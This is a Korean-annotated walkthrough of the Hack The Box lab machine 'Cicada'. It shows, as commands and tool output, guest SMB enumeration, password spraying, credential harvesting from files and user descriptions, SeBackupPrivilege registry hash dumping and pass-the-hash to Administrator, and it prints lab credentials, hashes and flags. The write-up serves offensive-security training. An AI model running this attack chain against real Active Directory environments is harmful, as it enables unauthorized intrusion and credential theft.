Proof of Concep
10.129.231.149
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanInformation Gathering
hosts 정보 수집
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 --generate-hosts-file hosts
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Cicada]
└─$ cat hosts
10.129.231.149 CICADA-DC.cicada.htb cicada.htb CICADA-DC/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Cicada]
└─$ cat /etc/hosts
<SNIP>
10.129.231.149 CICADA-DC.cicada.htb cicada.htb CICADA-DCAuth as michael.wrightson
Null 세션으로는 SMB 공유 폴더에 접근이 차단되지만 guest 계정으로는 인증이 가능했으며, HR 디렉토리에 읽기 권한이 존재
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u 'guest' -p '' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL Logon server shareSMB HR 디렉토리에 접근하여 “Notice from HR.txt” 파일 다운로드
┌──(kali㉿kali)-[~/Cicada]
└─$ smbclient //10.129.231.149/HR -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
4168447 blocks of size 4096. 482126 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)해당 파일에서 디폴트 비밀번호 획득
- Cicada$M6Corpb*@Lp#nZp!8
┌──(kali㉿kali)-[~/Cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp사용자 목록 추출
┌──(kali㉿kali)-[~/Cicada]
└─$ impacket-lookupsid cicada.htb/guest@10.129.231.149 -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.129.231.149
[*] StringBinding ncacn_np:10.129.231.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)Password Spraying 공격 결과 michael.wrightson으로 인증 성공
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success -t 100
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
<SNIP>
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Dev:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\:Cicada$M6Corpb*@Lp#nZp!8 (Guest)Auth as emily.oscars
Active Directory 유저 열거 결과 description에서 david.orelious 비밀번호 발견
- aRt$Lp#7t*VQ!3
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.231.149 445 CICADA-DC Administrator 2024-08-26 20:08:03 1 Built-in account for administering the computer/domain
SMB 10.129.231.149 445 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain
SMB 10.129.231.149 445 CICADA-DC krbtgt 2024-03-14 11:14:10 1 Key Distribution Center Service Account
SMB 10.129.231.149 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 0
SMB 10.129.231.149 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1
SMB 10.129.231.149 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB 10.129.231.149 445 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB 10.129.231.149 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 1
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated 8 local users: CICADAdavid.orelious 계정으로 SMB DEV 디렉토리 접근 가능
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV READ
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server shareDEV 디렉토리에 접근해서 Backup_script.ps1 파일 다운로드
┌──(kali㉿kali)-[~/Cicada]
└─$ smbclient //10.129.231.149/DEV/ -U 'david.orelious'
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 478070 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)Backup_script.ps1 파일에서 emily.oscars 계정 비밀번호 발견
- emily.oscars:Q!3@Lp#M6b7tVt
┌──(kali㉿kali)-[~/Cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"emily.oscars 계정으로 SMB와 WinRM 인증 성공
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc winrm 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.129.231.149 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.129.231.149 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)emily.oscars 계정으로 WinRM 접속
┌──(kali㉿kali)-[~/Cicada]
└─$ evil-winrm -i 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/1/2026 12:21 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
0371906e4768225a71b7049ed4ab8889
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::1a0
IPv6 Address. . . . . . . . . . . : dead:beef::7d0e:e696:1e19:5af8
Link-local IPv6 Address . . . . . : fe80::cf20:a348:cd1c:ce13%6
IPv4 Address. . . . . . . . . . . : 10.129.231.149
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%6
10.129.0.1Privilege Escalation
emily.oscars 계정 권한 확인
- SeBackupPrivilege, SeRestorePrivilege 존재
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabledemily.oscars가 보유한 SeBackupPrivilege 권한을 이용하여 administrator의 NTLM 해시 덤프
- 2b87e7c93a3e8a0ea4a581937016f341
┌──(kali㉿kali)-[~/Cicada]
└─$ nxc smb 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -M backup_operator
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
BACKUP_O... 10.129.231.149 445 CICADA-DC [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 10.129.231.149 445 CICADA-DC Saved HKLM\SAM to \\10.129.231.149\SYSVOL\SAM
BACKUP_O... 10.129.231.149 445 CICADA-DC Saved HKLM\SYSTEM to \\10.129.231.149\SYSVOL\SYSTEM
BACKUP_O... 10.129.231.149 445 CICADA-DC Saved HKLM\SECURITY to \\10.129.231.149\SYSVOL\SECURITY
SMB 10.129.231.149 445 CICADA-DC [*] Copying "SAM" to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SAM"
SMB 10.129.231.149 445 CICADA-DC [+] File "SAM" was downloaded to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SAM"
SMB 10.129.231.149 445 CICADA-DC [*] Copying "SECURITY" to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SECURITY"
SMB 10.129.231.149 445 CICADA-DC [+] File "SECURITY" was downloaded to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SECURITY"
SMB 10.129.231.149 445 CICADA-DC [*] Copying "SYSTEM" to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SYSTEM"
SMB 10.129.231.149 445 CICADA-DC [+] File "SYSTEM" was downloaded to "/home/kali/.nxc/logs/CICADA-DC_10.129.231.149_2026-02-01_164413.SYSTEM"
BACKUP_O... 10.129.231.149 445 CICADA-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
BACKUP_O... 10.129.231.149 445 CICADA-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.129.231.149 445 CICADA-DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.129.231.149 445 CICADA-DC $MACHINE.ACC:plain_password_hex:6209748a5ab74c44bd98fc5015b6646467841a634c4a1b2d6733289c33f76fc6427f7ccd8f6d978a79eec3ae49eb8c0b5b14e193ec484ea1152e8a04e01a3403b3111c0373d126a566660a7dd083aec1921d53a82bc5129408627ae5be5e945ed58cfb77a2a50e9ffe7e6a4531febd965181e528815d264885921118fb7a74eff51306dbffa4d6a0c995be5c35063576fc4a3eba39d0168d4601da0a0c12748ae870ff36d7fb044649032f550f04c017f6d94675b3517d06450561c71ddf8734100898bf2c19359c69d1070977f070e3b8180210a92488534726005588c0f269a7e182c3c04b96f7b5bc4af488e128f8
BACKUP_O... 10.129.231.149 445 CICADA-DC $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696
BACKUP_O... 10.129.231.149 445 CICADA-DC dpapi_machinekey:0x0e3d4a419282c47327eb03989632b3bef8998f71
dpapi_userkey:0x4bb80d985193ae360a4d97f3ca06350b02549fbb
BACKUP_O... 10.129.231.149 445 CICADA-DC NL$KM:cc1501f764391e7a5e538cc174e62b01369b50b8d07223d9b6c56e922f5708d81eba8e8123250327364c19b496cd251f8ff97f5d71e66e8cffcbeb5e4ea4e696
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
BACKUP_O... 10.129.231.149 445 CICADA-DC [*] Dumping NTDS...
SMB 10.129.231.149 445 CICADA-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.231.149 445 CICADA-DC [-] Could not connect: timed out
BACKUP_O... 10.129.231.149 445 CICADA-DC [*] Cleaning dump with user Administrator and hash 2b87e7c93a3e8a0ea4a581937016f341 on domain cicada.htb
BACKUP_O... 10.129.231.149 445 CICADA-DC [*] Successfully deleted dump files !획득한 administrator의 NTLM 해시를 사용해서 WinRM 접속 성공
┌──(kali㉿kali)-[~/Cicada]
└─$ evil-winrm -i 10.129.231.149 -u 'administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
7dba6469ae1365c9b378a36985aa0412
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::1a0
IPv6 Address. . . . . . . . . . . : dead:beef::7d0e:e696:1e19:5af8
Link-local IPv6 Address . . . . . : fe80::cf20:a348:cd1c:ce13%6
IPv4 Address. . . . . . . . . . . : 10.129.231.149
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%6
10.129.0.1